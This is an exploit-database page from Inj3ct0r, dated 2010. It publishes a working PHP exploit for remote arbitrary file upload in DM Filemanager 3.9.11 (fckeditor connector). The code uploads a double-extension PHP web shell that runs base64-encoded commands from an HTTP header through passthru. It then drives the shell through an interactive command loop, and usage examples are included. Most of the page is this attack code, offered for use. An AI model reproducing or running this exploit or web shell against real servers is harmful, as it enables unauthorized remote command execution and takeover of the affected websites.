<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
===============================================================

&lt;?php
/*
—————————————————————–
DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
—————————————————————–

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /’ __ /’__` / __ /’__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /’ _ ` / /_/__&lt;_ /’___ / /`’__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ &gt;&gt; Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I’m eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.dutchmonkey.com
Download : http://www.dutchmonkey.com/?file=downloads.html&amp;label=Downloads
exploited by ..: eidelweiss
Affected: version 3.9.11
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in /path/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this &quot;connector&quot;. (Set it to &quot;true&quot;).
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = ‘/userfiles/’ ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: ‘C:\MySite\UserFiles\’ or ‘/root/mysite/UserFiles/’.
[*] // Attention: The above ‘UserFilesPath’ must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array(‘7z’, ‘aiff’, ‘asf’, ‘avi’, ‘bmp’, ‘csv’, ‘doc’, ‘fla’, ‘flv’, ‘gif’, ‘gz’, [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array(‘bmp’,'gif’,'jpeg’,'jpg’,'png’) ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array(’swf’,'flv’) ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array(‘aiff’, ‘asf’, ‘avi’, ‘bmp’, ‘fla’, ‘flv’, ‘gif’, ‘jpeg’, ‘jpg’, ‘mid’, ‘mov’, ‘mp3′, ‘mp4′, ‘mpc’, ‘mpeg’, ‘mpg’, ‘png’, ‘qt’, ‘ram’, ‘rm’, ‘rmi’, ‘rmvb’, ’swf’, ‘tif’, ‘tiff’, ‘wav’, ‘wma’, ‘wmv’) ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn’t properly checked
*/

*/
error_reporting(0);
set_time_limit(0);
ini_set(&quot;default_socket_timeout&quot;, 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print &quot;n[-] No response from {$host}:80 Trying again…&quot;;
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = &quot;/fckeditor/editor/filemanager/connectors/php/config.php&quot;;
$file_ext = array(&quot;zip&quot;, &quot;jpg&quot;, &quot;fla&quot;, &quot;doc&quot;, &quot;xls&quot;, &quot;rtf&quot;, &quot;csv&quot;);

foreach ($file_ext as $ext)
{
print &quot;n[-] Trying to upload with .{$ext} extension…&quot;;

$data = &quot;–abcdefrn&quot;;
$data .= &quot;Content-Disposition: form-data; name=&quot;NewFile&quot;; filename=&quot;0k.php.{$ext}&quot;rn&quot;;
$data .= &quot;Content-Type: application/octet-streamrnrn&quot;;
$data .= &quot;&lt;?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?&gt;rn&quot;;
$data .= &quot;–abcdef–rn&quot;;

$packet = &quot;POST {$path}{$connector}?Command=FileUpload&amp;CurrentFolder={$path} HTTP/1.0rn&quot;;
$packet .= &quot;Host: {$host}rn&quot;;
$packet .= &quot;Content-Length: &quot;.strlen($data).&quot;rn&quot;;
$packet .= &quot;Content-Type: multipart/form-data; boundary=abcdefrn&quot;;
$packet .= &quot;Connection: closernrn&quot;;
$packet .= $data;

preg_match(&quot;/OnUploadCompleted((.*),’(.*)’)/i&quot;, http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die(&quot;n[-] Upload failed! (Error {$html[1]}: {$html[2]})n&quot;);

$packet = &quot;GET {$path}0k.php.{$ext} HTTP/1.0rn&quot;;
$packet .= &quot;Host: {$host}rn&quot;;
$packet .= &quot;Connection: closernrn&quot;;
$html = http_send($host, $packet);

if (!eregi(&quot;print&quot;, $html) and eregi(&quot;_code_&quot;, $html)) return $ext;

sleep(1);
}

return false;
}
print &quot;n+————————————————————————–+&quot;;
print &quot;n| DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit |&quot;;
print &quot;n+————————————————————————–+n&quot;;
if ($argc &lt; 3)
{
print &quot;nUsage……: php $argv[0] host pathn&quot;;
print &quot;nExample….: php $argv[0] localhost /&quot;;
print &quot;nExample….: php $argv[0] localhost /dm-filemanager/n&quot;;
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die(&quot;nn[-] Exploit failed…n&quot;);
else print &quot;n[-] Shell uploaded…starting it!n&quot;;
define(STDIN, fopen(&quot;php://stdin&quot;, &quot;r&quot;));
while(1)
{
print &quot;dm-filemanager-shell# &quot;;
$cmd = trim(fgets(STDIN));
if ($cmd != &quot;exit&quot;)
{
$packet = &quot;GET {$path}0k.php.{$ext} HTTP/1.0rn&quot;;
$packet.= &quot;Host: {$host}rn&quot;;
$packet.= &quot;Cmd: &quot;.base64_encode($cmd).&quot;rn&quot;;
$packet.= &quot;Connection: closernrn&quot;;
$html = http_send($host, $packet);
if (!eregi(&quot;_code_&quot;, $html)) die(&quot;n[-] Exploit failed…n&quot;);
$shell = explode(&quot;_code_&quot;, $html);
print &quot;n{$shell[1]}&quot;;
}
else break;
}
?&gt;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-24]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13460